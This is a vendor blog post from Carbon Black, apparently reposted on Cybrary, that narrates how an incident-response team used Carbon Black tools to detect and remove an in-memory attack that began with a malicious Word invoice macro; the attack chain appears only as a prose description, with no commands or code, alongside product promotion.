Carbon Black Report: A Case Study on Threat Hunting

save
Share and earn Cybytes
Facebook Twitter Google+ LinkedIn Email

There are certain seminal experiences you’ll remember all your life — your first kiss, your college graduation, the smell of your favorite home-cooked meal — and then hundreds of mini-experiences that helped you reach each milestone that in short order disappeared from view.

The memories you carry with you forever? That is akin to what computers save to disk. The other stuff? That’s like (ironically enough) system memory. Attackers used to execute malicious code on disk, where antivirus could better detect it. Today, as Black Cipher’s IR team saw firsthand at a large real estate and investment firm, cyber criminals have become sophisticated enough to carry out attacks through memory. As memory fades, the attackers’ tracks are covered, which makes detection — and ultimately remediation — a true challenge.

The malware, in this case, came in through a malicious Microsoft Word document labeled as an invoice. When someone inside the organization opened it, an attack was launched that ran a macro that called on the command prompt, which then called on PowerShell, which went to a malware distribution server, pulled down a malicious executable, ran it and then deleted it. The malware called back to a command-and-control server, which resulted in the attacker establishing a covert tunnel to the inside of the network. This tunnel opened the door for further activities such as data exfiltration, logging of keystrokes, credential theft and lateral movement.

This breach would have been virtually impossible to detect had it not been for Bit9 Advanced Threats feeds combined with Cb Response’s ability to create custom watchlists, which gave Black Cipher the network visibility it needed to quickly identify the entry point and terminate the attacker’s connection. What’s more, the tool allowed the IR team to remotely extract system memory to understand the nature of the threat (e.g., are they taking screenshots? Pulling documents?). This was especially crucial because the client fell under NY DFS 500 compliance and needed to quickly know whether or not to report.

Within two hours, the IR team had the attacker out of the system and was able to provide the answers their client needed to know in order to determine their compliance reporting requirements. The speed and efficiency of Black Cipher’s response were abetted not only by Carbon Black, but by their client’s own proactive IR plan, which, in this case, immediately initiated credential change and other protocols that softened the blow of the attack.

Incident response like this? Definitely worth remembering.

The post Carbon Black Report: A Case Study on Threat Hunting appeared first on Carbon Black.

Share this post and earn Cybytes
Facebook Twitter Google+ LinkedIn Email
Follow
110 Followers
About Carbon Black, Inc.
Carbon Black is the leading provider of next-generation endpoint security. Carbon Black’s Next-Generation Antivirus (NGAV) solution, Cb Defense, leverages breakthrough prevention technology, “Streaming Prevention,” to instantly see and stop cyberattacks before they execute. Cb Defense uniquely combines breakthrough prevention with market-leading detection and response into a single, lightweight agent delivered through the cloud. With more than 7 million endpoints under management, Carbon Black has more than 2,500 customers, including 30 of the Fortune 100. These customers use Carbon Black to replace legacy antivirus, lock down critical systems, hunt threats, and protect their endpoints from the most advanced cyberattacks, including non-malware attacks.
Promoted Content
15-Day Free Trial of NGAV + EDR in the Cloud
Compare Cb Defense to your current solution using real world scenarios, and see how operations transform across your security and IT teams. After you’ve finished the trial, you’ll have everything you need to build a business case and make the switch.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel